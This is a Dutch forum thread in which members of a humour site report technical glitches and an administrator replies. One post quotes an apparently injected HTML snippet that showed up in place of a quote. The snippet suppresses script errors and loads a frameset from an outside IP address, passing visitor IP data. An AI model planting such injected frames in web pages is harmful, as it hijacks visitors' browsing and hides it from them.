Storingsmeldingen |
Voogeltje Administrator
WMRindex: 1.751 OTindex: 3.684 T S |
Bovenaan deze pagina staat dat nog wel, ook als je naar bv offtopic gaat staat het er nog wel. Het koste te veel tijd om al die informatie in 1 keer samen te voegen. |
|
Theetje Oudgediende
WMRindex: 460 OTindex: 24.162 T |
Word in de linkerbalk "Nu op het forum" ook niet meer ge-update? |
|
Voogeltje Administrator
@Theemonster, deze blijft wel gewoon live... |
|
pietjevlip Oudgediende
WMRindex: 2.358 OTindex: 21.468
|
Afbeeldingen doen een beetje gek sinds vandaag (of misschien al iets langer, maar ik merk het pas nu ) meestal is het op een pagina dat 1 emoticon het even niet doet, of 1 specifiek avatar (F5 verhelpt dit wel). Als het een avatar betreft is het ook gewoon een rood kruisje, en geen deze-is-kaduuk |
|
Theetje Oudgediende
Quote Voogeltje: Theemonster, deze blijft wel gewoon live... oke Dan had hij gister ochtend even kuren Het viel me gisteravond ook weer op dat hij weer live was |
|
Theetje Oudgediende
Ligt het aan mij of laadt de mailbox ontzettend langzaam? (was toch de bedoeling dat die snller ging?) |
|
Wilco Oudgediende
WMRindex: 5.099 OTindex: 7.913 S |
geen problemen hier met de mailbox |
|
Andreesie Oudgediende
WMRindex: 1.051 OTindex: 44.629
|
@TheE: hier ook dat de mailbox sloom is geworden |
|
Voogeltje Administrator
Het kan zijn dat er iemand bezig is in zn mail box en dat dat andere mensen vertraagd. Alle mail staat in 1 en dezelfde tabel... |
|
Theetje Oudgediende
Ik had het toen straks volgens mij 3 keer achter elkaar, maar alleen als ik via de melding van een nieuw bericht naar mijn mailbox ging, hij was een stuk minder traag als ik gewoon via het menu ging.. Raar toch? |
|
Andreesie Oudgediende
|
laatst heb ik safari geinstalleerd op mijn pc (windows xp) en dat werkte prima, maar als waarmaarraar het even niet doet, dan doet hij het ook goed niet. een echte 5 minuten niet. en dan doet hij het wel in FF en in IE edit: ps: allemaal op dezelfde pc |
|
Yun Erelid
WMRindex: 199 OTindex: 2.891
|
Mijn broertje wilt een account maken op WMR, maar volgens de site bestaat de naam waikit al. en heeft hij zijn email al gebruikt. maar ik kon niets vinden in zoeken en hij weet zeker dat hij nooit zijn email heb gebruikt op WMR |
|
mafkees Erelid
WMRindex: 1.774 OTindex: 596
|
ik klikte bij het artikel over een vrouw die tussen haaien zwemt op "quote deze reactie" en toen verscheen er: <html><script language=JScript><!-- function killErrors(){return true;} window.onerror = killErrors; --></script><frameset rows="*"><frame src="http://221.231.148.193/index.html?uip=222.190.125.238&dip=85.158.249.226&url=http://waarmaarraar.nl/backend/quoteajax.php?reid=492061" noresize></frameset></html> in plaats van de reactie tussen de quote tags.. de tweede keer lukte het wel normaal |
|
Andreesie Oudgediende
|
of dat komt door mij, of deze layout is verneukt. en ik heb 2 keer gehad dat m ijn post zomaar weg was |
|
Andreesie Oudgediende
|
als ik ' ) neerzet, maar dan zonder spaties, dan krijg ik ';) oftewel: ')
das vaag
kijkm aar naar de broncode |
|
Wilco Oudgediende
de link naar het bericht over dat misvormde hoofd (vanaf de hoofdpagina) doet het bij mij niet. Ik krijg te zien: "Helaas geen berichtje gevonden" |
|
DreamerTje Oudgediende
WMRindex: 1.305 OTindex: 19.848 T S |
Eh, dat heb ik dus ook Wilde het net melden Wilco |
|
Kpuc Oudgediende
WMRindex: 7.557 OTindex: 38.305 S |
Voogel, vreemde tekens misschien? |
|
Wilco Oudgediende
nanananana, ik was eerder Dreamertje |
|
Voogeltje Administrator
Hij zou het nu wel gewoon moeten doen Kpuc: jep |
|
pietjevlip Oudgediende
WMRindex: 2.358 OTindex: 21.468
|
Het is in elk geval te bereiken via het voorgaande bericht en dan de link bovenin |
|
DreamerTje Oudgediende
Ik krijg trouwens ook niet alle berichten te zien die in het forum zijn geplaatst Het laatste berichtje van Wilco Quote Wilc0: nanananana, ik was eerder Dreamertje staat er bij mij niet tussen.. In de lijst dan "Nu op het forum" |
|
Kpuc Oudgediende
DreamerTje, kijk even naar de tijd van posten |
|
DreamerTje Oudgediende
Oh, krijg je dan het "eerste" berichtje te zien? |
|
Kpuc Oudgediende
Jeps, vaag maar waar |